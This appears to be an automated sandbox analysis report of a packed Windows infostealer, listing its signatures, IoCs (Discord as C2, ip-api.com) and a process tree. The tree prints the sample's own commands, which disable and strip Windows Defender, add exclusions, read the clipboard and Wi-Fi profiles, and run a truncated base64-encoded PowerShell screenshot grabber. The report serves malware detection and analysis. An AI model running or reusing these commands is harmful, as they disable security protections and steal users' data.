801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793

Analysis

max time kernel
50s
max time network
52s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-10-2024 19:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
Size

7.5MB
MD5

0738a5a832b62e68a740aa3401d332ef
SHA1

3f3b0acdc4cc580de58495ca3b5a2aa305362825
SHA256

801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793
SHA512

0f008f61aa87d1efb5c83f1bf701112565aee0b2991645e36e0e10d0aa415e9b8ed9972bf847cba90bfd2549d1233599b6c9adc174e354e181d267cbe51429ce
SSDEEP

196608:wct1WurErvI9pWjgaAnajMsK2CfQCS/OinHC1e:dt1WurEUWjJjYRoPhHYe

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
4532	powershell.exe
4064	powershell.exe
4568	powershell.exe
4956	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
1556	cmd.exe
760	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4732	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
26	discord.com
28	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
24	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
3964	tasklist.exe
4456	tasklist.exe
3768	tasklist.exe

UPX packed file 47 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b9b-21.dat	upx
behavioral2/memory/2516-25-0x00007FF92BBC0000-0x00007FF92C285000-memory.dmp	upx
behavioral2/files/0x000a000000023b8e-27.dat	upx
behavioral2/files/0x000a000000023b99-31.dat	upx
behavioral2/files/0x000a000000023b92-44.dat	upx
behavioral2/files/0x000a000000023b95-47.dat	upx
behavioral2/memory/2516-48-0x00007FF942E60000-0x00007FF942E6F000-memory.dmp	upx
behavioral2/files/0x000a000000023b94-46.dat	upx
behavioral2/files/0x000a000000023b93-45.dat	upx
behavioral2/files/0x000a000000023b91-43.dat	upx
behavioral2/files/0x000a000000023b90-42.dat	upx
behavioral2/files/0x000a000000023b8f-41.dat	upx
behavioral2/files/0x000a000000023b8d-40.dat	upx
behavioral2/files/0x000a000000023ba7-39.dat	upx
behavioral2/files/0x000b000000023b9f-38.dat	upx
behavioral2/files/0x000b000000023b9e-37.dat	upx
behavioral2/files/0x000a000000023b9a-34.dat	upx
behavioral2/files/0x000a000000023b98-33.dat	upx
behavioral2/memory/2516-30-0x00007FF940230000-0x00007FF940255000-memory.dmp	upx
behavioral2/memory/2516-54-0x00007FF940130000-0x00007FF94015D000-memory.dmp	upx
behavioral2/memory/2516-56-0x00007FF93ECA0000-0x00007FF93ECBA000-memory.dmp	upx
behavioral2/memory/2516-58-0x00007FF93BE00000-0x00007FF93BE24000-memory.dmp	upx
behavioral2/memory/2516-60-0x00007FF92B8A0000-0x00007FF92BA1E000-memory.dmp	upx
behavioral2/memory/2516-62-0x00007FF93B7F0000-0x00007FF93B809000-memory.dmp	upx
behavioral2/memory/2516-64-0x00007FF9411A0000-0x00007FF9411AD000-memory.dmp	upx
behavioral2/memory/2516-66-0x00007FF93B6D0000-0x00007FF93B703000-memory.dmp	upx
behavioral2/memory/2516-71-0x00007FF92B7D0000-0x00007FF92B89D000-memory.dmp	upx
behavioral2/memory/2516-74-0x00007FF940230000-0x00007FF940255000-memory.dmp	upx
behavioral2/memory/2516-73-0x00007FF92B0C0000-0x00007FF92B5E9000-memory.dmp	upx
behavioral2/memory/2516-70-0x00007FF92BBC0000-0x00007FF92C285000-memory.dmp	upx
behavioral2/memory/2516-76-0x00007FF93B7D0000-0x00007FF93B7E4000-memory.dmp	upx
behavioral2/memory/2516-79-0x00007FF940560000-0x00007FF94056D000-memory.dmp	upx
behavioral2/memory/2516-78-0x00007FF940130000-0x00007FF94015D000-memory.dmp	upx
behavioral2/memory/2516-82-0x00007FF92AFA0000-0x00007FF92B0BB000-memory.dmp	upx
behavioral2/memory/2516-81-0x00007FF93ECA0000-0x00007FF93ECBA000-memory.dmp	upx
behavioral2/memory/2516-83-0x00007FF93BE00000-0x00007FF93BE24000-memory.dmp	upx
behavioral2/memory/2516-97-0x00007FF92B8A0000-0x00007FF92BA1E000-memory.dmp	upx
behavioral2/memory/2516-202-0x00007FF9411A0000-0x00007FF9411AD000-memory.dmp	upx
behavioral2/memory/2516-278-0x00007FF93B6D0000-0x00007FF93B703000-memory.dmp	upx
behavioral2/memory/2516-294-0x00007FF92B7D0000-0x00007FF92B89D000-memory.dmp	upx
behavioral2/memory/2516-297-0x00007FF92B0C0000-0x00007FF92B5E9000-memory.dmp	upx
behavioral2/memory/2516-312-0x00007FF93B7D0000-0x00007FF93B7E4000-memory.dmp	upx
behavioral2/memory/2516-322-0x00007FF92B8A0000-0x00007FF92BA1E000-memory.dmp	upx
behavioral2/memory/2516-330-0x00007FF92AFA0000-0x00007FF92B0BB000-memory.dmp	upx
behavioral2/memory/2516-316-0x00007FF92BBC0000-0x00007FF92C285000-memory.dmp	upx
behavioral2/memory/2516-317-0x00007FF940230000-0x00007FF940255000-memory.dmp	upx
behavioral2/memory/2516-351-0x00007FF92BBC0000-0x00007FF92C285000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3696	cmd.exe
1456	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
4260	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
3716	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

pid	Process
4064	powershell.exe
4064	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
4532	powershell.exe
760	powershell.exe
760	powershell.exe
4000	powershell.exe
4000	powershell.exe
760	powershell.exe
4000	powershell.exe
4568	powershell.exe
4568	powershell.exe
4568	powershell.exe
4892	powershell.exe
4892	powershell.exe
4956	powershell.exe
4956	powershell.exe
3232	powershell.exe
3232	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4064	powershell.exe
Token: SeDebugPrivilege	4532	powershell.exe
Token: SeDebugPrivilege	3964	tasklist.exe
Token: SeDebugPrivilege	4456	tasklist.exe
Token: SeIncreaseQuotaPrivilege	820	WMIC.exe
Token: SeSecurityPrivilege	820	WMIC.exe
Token: SeTakeOwnershipPrivilege	820	WMIC.exe
Token: SeLoadDriverPrivilege	820	WMIC.exe
Token: SeSystemProfilePrivilege	820	WMIC.exe
Token: SeSystemtimePrivilege	820	WMIC.exe
Token: SeProfSingleProcessPrivilege	820	WMIC.exe
Token: SeIncBasePriorityPrivilege	820	WMIC.exe
Token: SeCreatePagefilePrivilege	820	WMIC.exe
Token: SeBackupPrivilege	820	WMIC.exe
Token: SeRestorePrivilege	820	WMIC.exe
Token: SeShutdownPrivilege	820	WMIC.exe
Token: SeDebugPrivilege	820	WMIC.exe
Token: SeSystemEnvironmentPrivilege	820	WMIC.exe
Token: SeRemoteShutdownPrivilege	820	WMIC.exe
Token: SeUndockPrivilege	820	WMIC.exe
Token: SeManageVolumePrivilege	820	WMIC.exe
Token: 33	820	WMIC.exe
Token: 34	820	WMIC.exe
Token: 35	820	WMIC.exe
Token: 36	820	WMIC.exe
Token: SeDebugPrivilege	3768	tasklist.exe
Token: SeDebugPrivilege	760	powershell.exe
Token: SeDebugPrivilege	4000	powershell.exe
Token: SeIncreaseQuotaPrivilege	820	WMIC.exe
Token: SeSecurityPrivilege	820	WMIC.exe
Token: SeTakeOwnershipPrivilege	820	WMIC.exe
Token: SeLoadDriverPrivilege	820	WMIC.exe
Token: SeSystemProfilePrivilege	820	WMIC.exe
Token: SeSystemtimePrivilege	820	WMIC.exe
Token: SeProfSingleProcessPrivilege	820	WMIC.exe
Token: SeIncBasePriorityPrivilege	820	WMIC.exe
Token: SeCreatePagefilePrivilege	820	WMIC.exe
Token: SeBackupPrivilege	820	WMIC.exe
Token: SeRestorePrivilege	820	WMIC.exe
Token: SeShutdownPrivilege	820	WMIC.exe
Token: SeDebugPrivilege	820	WMIC.exe
Token: SeSystemEnvironmentPrivilege	820	WMIC.exe
Token: SeRemoteShutdownPrivilege	820	WMIC.exe
Token: SeUndockPrivilege	820	WMIC.exe
Token: SeManageVolumePrivilege	820	WMIC.exe
Token: 33	820	WMIC.exe
Token: 34	820	WMIC.exe
Token: 35	820	WMIC.exe
Token: 36	820	WMIC.exe
Token: SeDebugPrivilege	4568	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeIncreaseQuotaPrivilege	5112	WMIC.exe
Token: SeSecurityPrivilege	5112	WMIC.exe
Token: SeTakeOwnershipPrivilege	5112	WMIC.exe
Token: SeLoadDriverPrivilege	5112	WMIC.exe
Token: SeSystemProfilePrivilege	5112	WMIC.exe
Token: SeSystemtimePrivilege	5112	WMIC.exe
Token: SeProfSingleProcessPrivilege	5112	WMIC.exe
Token: SeIncBasePriorityPrivilege	5112	WMIC.exe
Token: SeCreatePagefilePrivilege	5112	WMIC.exe
Token: SeBackupPrivilege	5112	WMIC.exe
Token: SeRestorePrivilege	5112	WMIC.exe
Token: SeShutdownPrivilege	5112	WMIC.exe
Token: SeDebugPrivilege	5112	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3736 wrote to memory of 2516	3736	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	84
PID 3736 wrote to memory of 2516	3736	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	84
PID 2516 wrote to memory of 2368	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	88
PID 2516 wrote to memory of 2368	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	88
PID 2516 wrote to memory of 5072	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	89
PID 2516 wrote to memory of 5072	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	89
PID 2368 wrote to memory of 4532	2368	cmd.exe	92
PID 2368 wrote to memory of 4532	2368	cmd.exe	92
PID 5072 wrote to memory of 4064	5072	cmd.exe	93
PID 5072 wrote to memory of 4064	5072	cmd.exe	93
PID 2516 wrote to memory of 1788	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	94
PID 2516 wrote to memory of 1788	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	94
PID 2516 wrote to memory of 1292	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	95
PID 2516 wrote to memory of 1292	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	95
PID 1788 wrote to memory of 3964	1788	cmd.exe	98
PID 1788 wrote to memory of 3964	1788	cmd.exe	98
PID 2516 wrote to memory of 1580	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	99
PID 2516 wrote to memory of 1580	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	99
PID 2516 wrote to memory of 1556	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	100
PID 2516 wrote to memory of 1556	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	100
PID 1292 wrote to memory of 4456	1292	cmd.exe	102
PID 1292 wrote to memory of 4456	1292	cmd.exe	102
PID 2516 wrote to memory of 1568	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	103
PID 2516 wrote to memory of 1568	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	103
PID 2516 wrote to memory of 1848	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	104
PID 2516 wrote to memory of 1848	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	104
PID 2516 wrote to memory of 3696	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	108
PID 2516 wrote to memory of 3696	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	108
PID 2516 wrote to memory of 3124	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	109
PID 2516 wrote to memory of 3124	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	109
PID 2516 wrote to memory of 4404	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	112
PID 2516 wrote to memory of 4404	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	112
PID 1580 wrote to memory of 820	1580	cmd.exe	115
PID 1580 wrote to memory of 820	1580	cmd.exe	115
PID 1848 wrote to memory of 4896	1848	cmd.exe	116
PID 1848 wrote to memory of 4896	1848	cmd.exe	116
PID 1556 wrote to memory of 760	1556	cmd.exe	117
PID 1556 wrote to memory of 760	1556	cmd.exe	117
PID 1568 wrote to memory of 3768	1568	cmd.exe	118
PID 1568 wrote to memory of 3768	1568	cmd.exe	118
PID 4404 wrote to memory of 4000	4404	cmd.exe	119
PID 4404 wrote to memory of 4000	4404	cmd.exe	119
PID 3124 wrote to memory of 3716	3124	cmd.exe	120
PID 3124 wrote to memory of 3716	3124	cmd.exe	120
PID 3696 wrote to memory of 1456	3696	cmd.exe	121
PID 3696 wrote to memory of 1456	3696	cmd.exe	121
PID 2516 wrote to memory of 1872	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	122
PID 2516 wrote to memory of 1872	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	122
PID 1872 wrote to memory of 1748	1872	cmd.exe	130
PID 1872 wrote to memory of 1748	1872	cmd.exe	130
PID 2516 wrote to memory of 4800	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	125
PID 2516 wrote to memory of 4800	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	125
PID 4800 wrote to memory of 4616	4800	cmd.exe	127
PID 4800 wrote to memory of 4616	4800	cmd.exe	127
PID 2516 wrote to memory of 5060	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	128
PID 2516 wrote to memory of 5060	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	128
PID 2516 wrote to memory of 1748	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	130
PID 2516 wrote to memory of 1748	2516	801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe	130
PID 5060 wrote to memory of 3680	5060	cmd.exe	153
PID 5060 wrote to memory of 3680	5060	cmd.exe	153
PID 4000 wrote to memory of 448	4000	powershell.exe	133
PID 4000 wrote to memory of 448	4000	powershell.exe	133
PID 1748 wrote to memory of 4568	1748	cmd.exe	134
PID 1748 wrote to memory of 4568	1748	cmd.exe	134

C:\Users\Admin\AppData\Local\Temp\801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
"C:\Users\Admin\AppData\Local\Temp\801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:3736
- C:\Users\Admin\AppData\Local\Temp\801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe
  "C:\Users\Admin\AppData\Local\Temp\801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2368
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\801b6a76fb426d2ec7658f849fb6279489d827f03997d052eb969a709a8c6793.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5072
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1788
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3964
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1292
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1580
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:1556
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:760
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1568
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3768
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1848
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3696
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:1456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3124
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:3716
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAP